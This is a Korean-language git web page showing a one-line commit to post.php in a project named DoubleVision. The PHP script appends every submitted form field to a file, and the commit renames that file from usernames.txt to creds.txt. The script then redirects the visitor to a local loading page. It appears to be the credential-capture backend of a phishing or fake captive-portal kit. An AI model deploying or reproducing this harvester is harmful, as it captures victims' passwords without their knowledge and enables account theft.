소스 검색

Update post.php

assume-breach 3 년 전
부모
커밋
ed84ed2e9c
1개의 변경된 파일1개의 추가작업 그리고 1개의 파일을 삭제
  1. 1 1
      DoubleVision/html/post.php

+ 1 - 1
DoubleVision/html/post.php

@@ -1,6 +1,6 @@
 <?php
 header ('Location:http://10.1.1.1/loading.html');
-$handle = fopen("usernames.txt", "a");
+$handle = fopen("creds.txt", "a");
 foreach($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");